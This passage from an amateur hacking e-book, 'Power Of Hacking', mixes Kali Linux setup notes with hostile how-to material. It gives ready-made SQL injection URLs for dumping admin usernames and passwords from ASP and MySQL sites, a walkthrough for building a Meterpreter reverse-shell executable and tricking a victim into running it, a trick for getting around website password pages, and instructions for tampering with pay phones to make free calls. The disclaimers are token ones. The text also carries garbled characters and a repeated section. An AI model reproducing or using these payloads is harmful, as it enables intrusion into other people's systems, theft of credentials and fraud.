easily be fooled into entering sensitive information or navigating to malicious websites. It can also be used to carry out other attacks such as cross-site scripting and phishing. Malware: Using malware is another popular way of hacking Internet users. Hackers
Mail:mtahirzahid@yahoo.com
Page 71
Power Of Hacking make use of malware programs like virus and Trojan horses to accomplish their task by affecting large number of people. A popular example of such attack is the use of “DNSChanger” Trojan which affected millions of Internet users by hijacking their DNS servers. Instant Messaging: Attackers can also target IM users by sending them unsolicited offers in the form of files and links. This may mislead the users into installing malware or navigating to malicious websites. Blanck Status update karoo:Sb se pahle ap apne fb wall pe jae aur apne status pe ye alfaz likhe. . . @[0:0: ] @[0:0: ] @[0:0: ] @[0:0: ] @[0:0: ]
10o0% w0rking HACKING ASP / ASPX SITES -- (MANUALLY) :ASPX Injection is also similar to PHP based SQL Injection. But here, we don’t use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors. Find Out A Vulnerable Link First, we need find out a vulnerable asp/aspx link which looks like http://www.vulnerablesite.com/index.aspx?id=10 CHECKING FOR VULNERABILITY Mail:mtahirzahid@yahoo.com
Page 72
Power Of Hacking As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL. http://www.vulnerablesite.com/gallery.aspx?id=10′ If it gives an error similar to the following, then our site is vulnerable to sql injection. To check the error just type apostrophe at the end of the vulnerable URL http://website.org/search.aspx?txt=EDIT’
To check that whether the site is vulnerable or not just type “having 1=1--“at the end of the URL.
Mail:mtahirzahid@yahoo.com
Page 73
Power Of Hacking http://website.org/search.aspx?txt=EDIT' having 1=1--
In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column. We will directly find out the table names, column names and then we will extract the data. Finding Version http://website.org/search.aspx?txt=EDIT' and 1=convert(int,@@version)--
To know the DATABASE NAME Mail:mtahirzahid@yahoo.com
Page 74
Power Of Hacking http://website.org/search.aspx?txt=EDIT' and 1=convert(int,db_name())--
Finding Username http://website.org/search.aspx?txt=EDIT' and 1=convert(int,user_name())--
FINDING OUT THE TABLE NAMES In this code, it retrieves the first table name from the database. As in windows server it can not convert character value into data type. so we will get an error as shown in the next slide from
Mail:mtahirzahid@yahoo.com
Page 75
Power Of Hacking which we can get the first table name. Finding Table Names http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables))--
But this may not be the desired table for us. So we need to find out the next table name in the database. Finding 2 nd Table Name http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not
Mail:mtahirzahid@yahoo.com
Page 76
Power Of Hacking in('pp_category')))--
Finding 3 rd Table Name http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('pp_category','pp_admin_tb')))--
Finding 4 th Table Name http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not
Mail:mtahirzahid@yahoo.com
Page 77
Power Of Hacking in('pp_category','pp_admin_tb','pp_ans_tb')))--
FINDING OUT THE COLUMNS Now we got the admin table named as â&#x20AC;&#x153;pp_admin_tbâ&#x20AC;?. So we need to find out the columns now. Finding Column Name http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb'))--
If the first column is not related to our desired column names, then try to find next column name by Mail:mtahirzahid@yahoo.com
Page 78
Power Of Hacking the same method as we get table name. Finding Column name Fields http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb' and column_name not in('adminsign_id')))--
Finding Next Column Field Name http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb' and column_name not in('adminsign_id','email_id')))--
EXTRACTING THE DATA After finding out all the columns, we need to extract the data such as user names and passwords. Extracting the Username information Mail:mtahirzahid@yahoo.com
Page 79
Power Of Hacking http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 email_id from pp_admin_tb))--
Extracting the Password information http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 password from pp_admin_tb))--
Hack your friend by using BackTrack 5 | Backtrack 5 tutorial BackTrack 4 is an penetration testing tool that is run as an live CD , it is an modded form of Linx(Ubuntu) that can be used for hacking.In this tutorial I will show you how to generate payloads in it. WARNING !!!!!!!!!!!!!! THIS HAS BEEN DISCUSSED TO TELL YOU ABOUT THE WAYS IN WHICH YOUR COMPUTER MIGHT BE EXPLIOTED !!!! DO NOT USE THIS TO HACK ANYONE !!!! READ
Mail:mtahirzahid@yahoo.com
Page 80
Power Of Hacking MORE HERE !!!! DO NOT USE THIS ON ANYONE ELSE OTHER THAN YOURSELF ! First get backtrack at and set it up as per my guide here. In this tutorial we will be using a useful tool on Backtrack 4 to create a payload which we will then send a slave, the payload created is in exe, once the slave is Social Engineered into running the payload, A meterpreter session will appear to us. We will set it up with a listener on a port, meaning we will have a shell prompt open, waiting for a connection from the slave, once this occurs we have a session, and entry to the victims machine. Start by opening Bt 4 etc, then scroll to Backtrack, Penetration, Fast-Track, FastTrack interactive, this will open a prompt like below.
Choose option 7, it will then ask what exploit you want to use, choose exploit 2.
Mail:mtahirzahid@yahoo.com
Page 81
Power Of Hacking
It will then ask you for an Ip address, you can either enter your own, or the victims, its easier to enter our own (the listener). To obtain your IP on Backtrack
Mail:mtahirzahid@yahoo.com
Page 82
Power Of Hacking 4, open a shall and type ifconfig, your IP appears after inet addr, like below.
It will then ask you to choose a port for the listener, choose a random port that isnt in use, for this we will use port 4444, and then choose the payload to be compiled in exe format rather than shell script (text). Also choose yes on starting a listener, this basically means a shell will be opened blank, waiting for the slave to run the exe, once run the connection is made, and the listening shell will then spawn the
Mail:mtahirzahid@yahoo.com
Page 83
Power Of Hacking meterpreter session between your and the victims machine.
At this point, the payload has been created, and the listener has launched, all you have to do now is locate the payload, I would advise you to rename it, Social Engineer the slave into running it, and then check your listening shell for a connection. If successful you will then have a meterpreter session opened and entry to the victims machine.
Mail:mtahirzahid@yahoo.com
Page 84
Power Of Hacking Below is the location of the payload you will send.
MySQL is a relational database management system (RDBMS) that runs as a server providing multi-user access to a number of databases. MySQL is officially pronounced /ma???skju???l/ ("My S-Q-L") but is often pronounced /ma??si?kwÉ&#x2122;l/ ("My Sequel"). It is named for original developer Michael Widenius's daughter my. The MySQL development project has made its source code available under the terms of the GNU General Public License, as well as under a variety of proprietary agreements. MySQL is owned and sponsored by a single forprofit firm, the Swedish company MySQL AB, now owned by Sun Microsystems, a subsidiary of Oracle Corporation. Members of the MySQL community have created several forks such as
Mail:mtahirzahid@yahoo.com
Page 85
Power Of Hacking Drizzle, OurDelta, Percona Server, and MariaDB. All of these forks were in progress before the Oracle acquisition (Drizzle was announced 8 months before the Sun acquisition). Free-software projects that require a full-featured database management system often use MySQL. Such projects include (for example) WordPress, phpBB, Drupal and other software built on the LAMP software stack. MySQL is also used in many high-profile, large-scale World Wide Web products including Wikipedia and Facebook. So lets start with how to exploit the MySQL injection vulnerability ☺ We will try to get some useful information from sql injection ☺ THE VERY FIRST STEP: CHECKING FOR VULNEARBILITY Suppose we have website like this:http://www.site.com/news.php?id=7 To test this URL, we add a quote to it ‘ http://www.site.com/news.php?id=7’ On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."Or something like that, that means the target is vulnerable to sql injection ☺ FINDING THE COLUMNS To find number of columns we use statement ORDER BY (tells database how to order the result). In order to use, we do increment until we get an error. Like: http://www.site.com/news.php?id=7 order by 1/* <-- no error http://www.site.com/news.php?id=7 order by 2/* <-- no error http://www.site.com/news.php?id=7 order by 3/* <-- no error http://www.site.com/news.php?id=7 order by 4/* <-- error (we get message
Mail:mtahirzahid@yahoo.com
Page 86
Power Of Hacking like this Unknown column '4' in 'order clause' or something like that) This means that it has 3 columns, cause we got an error on 4. CHECKING FOR UNION FUNCTION Our next is step is to check for union function. This is because with union function we can select more data in one statement only. Like: http://www.site.com/news.php?id=7 union all select 1,2,3/* (we already found that number of columns are 3) If we see some numbers on screen, i.e. 1 or 2 or 3, that means the UNION works CHECKING FOR MySQL VERSION Lets us check for the MySQL version. Lets us assume that on checking for union function, we got number 3 on the screen. So for detecting the version, we will replace number 3 of our query by @@version or version(). Like: http://www.site.com/news.php?id=7 union all select 1,2,@@version/* if you get an error union + illegal mix of collations (IMPLICIT + COERCIBLE), we need a convert() function. Like with hex() or unhex(): http://www.site.com/news.php?id=5 union all select 1,2,unhex(hex(@@version))/* GETTING TABLE AND COLUMN NAME This is for MySQL version < 5. Later in this paper Iâ&#x20AC;&#x2122;ll be discussing it for version > 5. common table names are: user/s, admin/s, member/s common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc So our query will be like this: http://www.site.com/news.php?id=7 union all select 1,2,3 from admin/* We see number 3 on the screen like before. Now we know that table admin
Mail:mtahirzahid@yahoo.com
Page 87
Power Of Hacking exists. Now to check column names we craft a query: http://www.site.com/news.php?id=7 union all select 1,2,username from admin/* (if you get an error, then try the other column name) We get username displayed on screen; example would be admin, or superadmin etc Now to check for the column password, we craft this query: http://www.site.com/news.php?id=7 union all select 1,2,password from admin/* (if you get an error, then try the other column name) If we got successful, we will see password on the screen. It can be in plain text or hash depending on how the database has been setup â&#x2DC;ş. Now we must complete the query. For that we can use concat() function (it joins strings): http://www.site.com/news.php?id=7 union all select 1,2,concat(username,0x3a,password)from admin/* Note that we put 0x3a, its hex value for : (so 0x3a is hex value for colon) Now we get displayed username: password on screen, i.e. admin: admin or admin: some hash, we can log into the site as admin â&#x2DC;ş FOR MySQL > 5 In this case, we will need information_schema. It holds all the tables and columns in the database. So to get it, we use table_name and information_schema. Like: http://www.site.com/news.php?id=5 union all select 1,2,table_name from information_schema.tables/* Here we replace the our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of query to list out all tables. Like: http://www.site.com/news.php?id=7 union all select 1,2,table_name from information_schema.tables limit 0,1/*
Mail:mtahirzahid@yahoo.com
Page 88
Power Of Hacking Note that I put 1, 0 i.e. getting result 1 form 0 Now to view the second table, we change limit 0, 1 to limit 1, 1: http://www.site.com/news.php?id=7 union all select 1,2,table_name from information_schema.tables limit 1,1/* The second table is displayed. For third table we put limit 2,1 http://www.site.com/news.php?id=7 union all select 1,2,table_name from information_schema.tables limit 2,1/* Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc ☺ To get the column names the method is the same. Here we use column_name and information_schema.columns. Like: http://www.site.com/news.php?id=5 union all select 1,2,column_name from information_schema.columns limit 0,1/* The first column name is displayed. For second column we will change the limit for 0,1 to 1,0 and so on. If you want to display column names for specific table use where clause Let us assume that we have found a table “user”. Like: http://www.site.com/news.php?id=7 union all select 1,2,column_name from information_schema.columns where table_name='users'/* Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users. Note that this won't work if the magic quotes is ON. Let’s say that we found columns user, pass and email. Now to complete query to put them all together using concat(): http://www.site.com/news.php?id=7 union all select 1,2 concat(user,0x3a,pass,0x3a,email) from users/*
Mail:mtahirzahid@yahoo.com
Page 89
Power Of Hacking What we get here is user:pass:email from table users. Example: admin:hash:whatever@abc.com BLIND SQL INJECTION The above we discussed comes under Error based sql injection. Let us the discuss the harder part i.e. Blind sql injection. We use our example: http://www.site.com/news.php?id=7 Let’s test it: http://www.site.com/news.php?id=7 and 1=1 <--- this is always true and the page loads normally, that's ok. http://www.site.com/news.php?id=7 and 1=2 <--- this is false, so if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection. ☺ GETTING MySQL VERSION To get the MySQL version in blind attack we use substring: http://www.site.com/news.php?id=7 and substring(@@version,1,1)=4 This should return TRUE if the version of MySQL is 4. Replace 4 with 5, and if query return TRUE then the version is 5. CHECKING FOR SUBSELECT When select don't work then we use subselect: http://www.site.com/news.php?id=7 and (select 1)=1 If page loads normally then subselect work, then we are going to see if we have access to mysql.user: http://www.site.com/news.php?id=7 and (select 1 from mysql.user limit 0,1)=1 If page loads normally we have access to mysql.user and then later we can pull some password using load_file() function and OUTFILE. CHECKING FOR TABLE AND COLUMN NAME
Mail:mtahirzahid@yahoo.com
Page 90
Power Of Hacking Here luck and guessing works more than anything â&#x2DC;ş http://www.site.com/news.php?id=7 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.) Then if the page loads normally without content missing, the table users exits. If you get FALSE (some article missing), just change table name until you guess the right one. Letâ&#x20AC;&#x2122;s say that we have found that table name is users, now what we need is column name. The same as table name, we start guessing. Like i said before try the common names for columns: http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 If the page loads normally we know that column name is password (if we get false then try common names or just guess). Here we merge 1 with the column password, then substring returns the first character (1,1) PULL DATA FROM DATABASE We found table users i columns username password so we gonna pull characters from that. Like: http://www.site.com/news.php?id=7 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Ok this here pulls the first character from first user in table users. Substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with symbol greater then > .So if the ascii char greater then 80, the page loads normally. (TRUE) we keep trying until we get false. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
Mail:mtahirzahid@yahoo.com
Page 91
Power Of Hacking We get TRUE, keep incrementing. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 TRUE again, higher http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 FALSE!!! So the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'. So keep incrementing until you get the end. (when >0 returns false we know that we have reach the end). There are lots of tools available for blind sql injection and can be used as people donâ&#x20AC;&#x2122;t like manual work because blind sql injection take out your
whole patience â&#x2DC;ş Introducing Kali Linux The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that to move forward with the challenges of cyber security and modern testing a new foundation was Mail:mtahirzahid@yahoo.com
Page 92
Power Of Hacking needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant filesystem. Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day. That means users have the latest package updates and security fixes. The new compliant filesystems translate into running most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features in Kali Linux. Kali Linux is available for download at http://www.kali.org/ . Kali system setup Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit images. If you plan on using Kali Linux on a virtual machine such as VMware, there is a VM image prebuilt. The advantage of downloading the VM image is that it comes preloaded with VMware tools. The VM image is a 32-bit image with Physical Address Extension support, or better known as PAE. In theory, a PAE kernel allows the system to access more system memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems that have argued for and against the usefulness of a PAE kernel. However, the authors of this book suggest using the VM image of Kali Linux if you plan on using it in a virtual environment. Running Kali Linux from external media Kali Linux can be run without installing software on a host hard drive by accessing it from an external media source such as a USB drive or DVD. This method is simple to enable; however, it has performance and operational implementations. Kali Linux having to load programs from a remote source would impact performance and some
Mail:mtahirzahid@yahoo.com
Page 93
Power Of Hacking applications or hardware settings may not operate properly. Using read-only storage media does not permit saving custom settings that may be required to make Kali Linux operate correctly. It's highly recommended to install Kali Linux on a host hard drive. Installing Kali Linux Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are shown in the following list, although we suggest exceeding the minimum amount by at least three times. Kali Linux, in general, will perform better if it has access to more RAM and is installed on newer machines. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install. The following is a list of minimum installation requirements: • A minimum of 8 GB disk space for installing Kali Linux. • For i386 and amd64 architectures, a minimum of 512MB RAM. • CD-DVD Drive / USB boot support. • You will also need an active Internet connection before installation. This is very important or you will not be able to configure and access repositories during installation. 1. When you start Kali you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based)
Mail:mtahirzahid@yahoo.com
Page 94
Power Of Hacking you would like to perform.
2. Select the local language preference, country, and
Mail:mtahirzahid@yahoo.com
Page 95
Power Of Hacking keyboard preferences.
3. Select a hostname for the Kali Linux host. The default
Mail:mtahirzahid@yahoo.com
Page 96
Power Of Hacking hostname is Kali.
4. Select a password. Simple passwords may not work so
Mail:mtahirzahid@yahoo.com
Page 97
Power Of Hacking chose something that has some degree of complexity.
5. The next prompt asks for your timezone. Modify accordingly and select Continue. The next screenshot shows selecting
Mail:mtahirzahid@yahoo.com
Page 98
Power Of Hacking Eastern standard time.
The installer will ask to set up your partitions. If you are installing Kali on a virtual image, select Guided Install â&#x20AC;&#x201C; Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configurations to customize partitions. Kali also offers the option of using LVM, logical volume manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change from initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to
Mail:mtahirzahid@yahoo.com
Page 99
Power Of Hacking use it.
6. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process as shown
Mail:mtahirzahid@yahoo.com
Page 100
Power Of Hacking in the following screenshot:
7. Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via HTTP protocol. If your network uses a proxy server, you will also need to configure
Mail:mtahirzahid@yahoo.com
Page 101
Power Of Hacking the proxy settings for you network.
8. Kali will prompt to install GRUB. GRUB is a multi-bootloader that gives the user the ability to pick and boot up to multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the options to boot into an alternative operating system. If it does not detect any other operating systems, the machine will
Mail:mtahirzahid@yahoo.com
Page 102
Power Of Hacking automatically boot into Kali Linux.
9. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue
Mail:mtahirzahid@yahoo.com
Page 103
Power Of Hacking to reboot your system.
Kali Linux and VM image first run On some Kali installation methods, you will be asked to set the root's password. When Kali Linux boots up, enter the root's username and the password you selected. If you downloaded a VM image of Kali, you will need the root password. The default
Mail:mtahirzahid@yahoo.com
Page 104
Power Of Hacking username is root and password is toor
Kali toolset overview Kali Linux offers a number of customized tools designed for Penetration Testing. Tools are categorized in the following groups as seen in the drop-down menu shown in the following screenshot:
Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to Mail:mtahirzahid@yahoo.com
Page 105
Power Of Hacking protocols used. • Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools. • Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this book come directly from this category. However web applications do not always refer to attacks against web servers, they can simply be web-based tools for networking services. For example, web proxies will be found under this section. • Password Attacks: This section of tools primarily deals with brute force or the offline computation of passwords or shared keys used for authentication. • Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that can be configured by Kali to be put in promiscuous mode. • Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target. • Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulators, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications. • Maintaining Access: Maintaining Access tools are used once a foothold is established into a target system or network. It is common to find compromised systems having multiple hooks back to the attacker to
Mail:mtahirzahid@yahoo.com
Page 106
Power Of Hacking provide alternative routes in the event a vulnerability that is used by the attacker is found and remediated. • Reverse Engineering: These tools are used to disable an executable and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or lead to development of other programs. Reverse Engineering is also used for malware analysis to determine what an executable does or by researchers to attempt to find vulnerabilities in software applications. Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a denial of service attack). • Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Ardunio tools that are used for programming and controlling other small electronic devices. • Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications. • Reporting Tools: Reporting tools are methods to deliver information found during a penetration exercise. • System Services: This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH. There are other tools included in the Kali Linux build such as web browsers, quick links to tune how the Kali Linux build is seen on the network, search tools, and other useful applications. Company website There is a lot of valuable information that can be obtained from a target's website.
Mail:mtahirzahid@yahoo.com
Page 107
Power Of Hacking Most corporate websites list their executive team, public figures, and members from recruiting and human resource contacts. These can become targets for other search efforts and social engineering attacks. More valuable information can be obtained by looking at what other companies are listed as partners, current job postings, business information, and security policies. Reconnaissance on a high-valued partner can be as important as the primary target, because partners may provide a new source for obtaining intelligence. An example is compromising a contracted resource that manages the helpdesk at a target's headquarters. The Robots.txt file is publicly available and found on websites that gives instructions to web robots (also known as search engine spiders), about what is and not visible using the Robots Exclusion Protocol. The Disallow: / statement tells a browser not to visit a source; however, a Disallow can be ignored by giving a researcher intelligence on what a target hopes to not disclose to the public. To view the Robots.txt file, find the Robots.txt file in the root directory of a target website. For example, adding the Robots.txt file to Facebook would look as shown
Mail:mtahirzahid@yahoo.com
Page 108
Power Of Hacking in the following screenshot:
Maltego â&#x20AC;&#x201C; Information Gathering graphs Maltego is a Reconnaissance tool built into Kali developed by Paterva. It is a multipurpose Reconnaissance tool that can gather information using open and public information on the Internet. It has some built-in DNS Reconnaissance, but goes much deeper into fingerprinting your target and gathering intelligence on them. It takes the information and displays the results in a graph for analysis. To start Maltego, navigate to Application menu in Kali, and click on the Kali menu. Then select Information Gathering | DNS Analysis | Maltego. The first step when you launch Maltego is to register it. You cannot use the
Mail:mtahirzahid@yahoo.com
Page 109
Power Of Hacking application without registration.
When you complete registration, you will be able to install Maltego and start using the application.
Maltego has numerous methods of gathering information. The best way to use Mail:mtahirzahid@yahoo.com
Page 110
Power Of Hacking Maltego is to take advantage of the startup wizard to select the type of information you want to gather. Experienced users may want to start with a blank graph or skip the wizard all together. The power of Maltego is that it lets you visually observe the relationship between a domain, organization, and people. You can focus around a specific organization, or look at an organization and its related partnerships from DNS queries. Depending on the scan options chosen, Maltego will let you perform the following tasks: • Associate an e-mail address to a person • Associate websites to a person • Verify an e-mail address • Gather details from Twitter, including geolocation of pictures Most of the features are self-explanatory and include how they are used under the feature description. Maltego is used commonly to gather information and sometimes
Mail:mtahirzahid@yahoo.com
Page 111
Power Of Hacking used as the first step during a social engineering attack.
Hacking Password Protected Website's By Pinglocalhost ************************ There are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting [ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com . Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there. For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1. We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its subdirectories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would
Mail:mtahirzahid@yahoo.com
Page 112
Power Of Hacking be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (DISCLAIMER)XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX The Info Above Is Lame!!!. I Dont Condone The Use Of This Document In A Malisous Manner. I Suggest That U Dont Do it But U Do What Ever U Want. I Will Not Be Responsible For Any Thing That Might Happen To U If U Use This. :)
There are many ways to defeat java-script protected web sites. S ome are very simplistic, such as hitting ctl-alt-del when the password box is displayed, to simply turning off java capability, which will dump you into t he default page. You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you w ant access to www.target.com . Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directo ry, and give you a text list of all the images located there. Often, the t itle of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a g ood chance then, that there is a 'games' directory on the site, so you wou ld then type in www.target.com/games, and if it is a valid directory, you aga in get a text listing of all thefiles available there. For a more automated a pproach, use a program like WEB SNAKE from anawave, or Web Wacker. These pro grams will create a mirror image of an entire web site, showing all director ies, or even mirror a complete server. They are indispensable for locating hidden files and directories. What do you do if you can't get past an openin g "Password
Mail:mtahirzahid@yahoo.com
Page 113
Power Of Hacking Required" box? First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1. We then go to 100.100.100.1, and then launch \ Web Snake, and mirror the e ntire server. Set Web Snake to NOT download anything over about 20K. (not ma ny HTML pages are bigger than this) This speeds things up some, and keeps yo u from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of i ts sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here. By simply typ ing in the url www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading. How To Make Free Phone Calls
Have you ever got stuck some ware and just about 6'ft away from you there is a pay phone, but yet you dont have any change(=( bummer) to call your famaly members or some one to come and pick you up(hehe that sux)?
Well im going to show you some thing that might get you arrested(shit now what) or it might get you home( now thats what im talking about!)its a chance that you have to take depends were are you.
Ok now before we go on let me let you know that this is not thateasy to do, but anyways lets start. A pay phone is not like a regular home phone. A pay phone runs through a diffrent amount of Mail:mtahirzahid@yahoo.com
Page 114
Power Of Hacking electricity and wires even the electricity flow is diffrent, Well anyways that is enoght of electrical talk lets get to the good part.
Ok to get free call's on a pay phone you will frist have to twist the phone wire just about 50 to 60 times then you will pull on the phonewire untill the metal part crackes off phone keep doing it if the metalpart is completely off the phone.... Now assuming that it is off you willsee a few colored wires in side the metal wire of the pay phone there should be a black, red, yellow one in side it and a really metallthick one in the middle(NOTE that some phone has diffrent colored wires)now the one wire that we are looking for is the black one. Now here ishow its done.. rip off the plastic of that wire(you can take it out with your teeth, you wont get electricuted =) hehe ).
Now assuming that you have taken apart the plastic off the wire(does not has to be all of it)now you will take that wire and aply it to the phone with the metal part of the phone touching the wire that you ripped off its plastic.. if you are aplying it correctly then you should here a static on the phone.. so make sure you have that phone on your ear.. now with the wire being aplyed to the phone(the metal part right next tothe buttons)Dial the number that you wish to call.. onces you hear it ringing then you can let go of the wire that you was applying.. and BINGO... say hello to mami and daddy for me =).. welp that is all enjoy your call.. ohh and by the wayyes this also comes with long distance hehe, and no! you can not use it to logg on to aol... Peace. How To See Hidden Files, Using Dos at command prompt just type dir /ah if the list is too long u can use dir /ah/p/w How To Speed Up A Slow Computer
first off in the bottom right hand corner of your computer if you see alot of icons start up there when you first start your computer then this is for you if you dont know already how to get rid of em.
Press your Start Button (bottom left) and go to "run" now type in: msconfig
Mail:mtahirzahid@yahoo.com
Page 115
Power Of Hacking now you will get a box that pops up and will tell you bunch of stuff dont mess with anything else other than what I tell you otherwise you could do something really bad (possible) go to your "startup" tab on the top right of the screen where it usually is and click it.
Now you will have a closed in box with bunch of filenames n addresses and more boxes with checks in them. Now if your like me you dont want anything startin up when you start you computer up or while your even doing anything cause it slows you down. Now unless your like me right now 1 have 1 thing starting up when my computer starts up and thats my settin for my overclocked vid card. But other than that uncheck every box and then hit apply and ok. Then window you were jus in will now close and ask you if you want to restart or wait till later to restart.
Either way when you shut it off and then turn it back on the settins will kick in Install Xp From Dos
If XP will not install from the CD or if you have a new drive with no operating system on it yet try these:
Install Windows XP from the hard drive with Windows 98 already installed:
Boot Windows 98 Insert the XP CD into your CD reader Explore Windows XP through My Computer Copy i386 folder to C:\ Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive
Install Windows XP from DOS (ie. no OS on a new hard drive):
Boot with a Windows 98 Start Up disk Insert the Windows 98 CD into the CD reader Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching) Mail:mtahirzahid@yahoo.com
Page 116
Power Of Hacking Type cd.. to back up to the root directory Insert Windows XP CD into the CD reader Copy the i386 folder to C:\ Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive. IPHOWTO:Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.
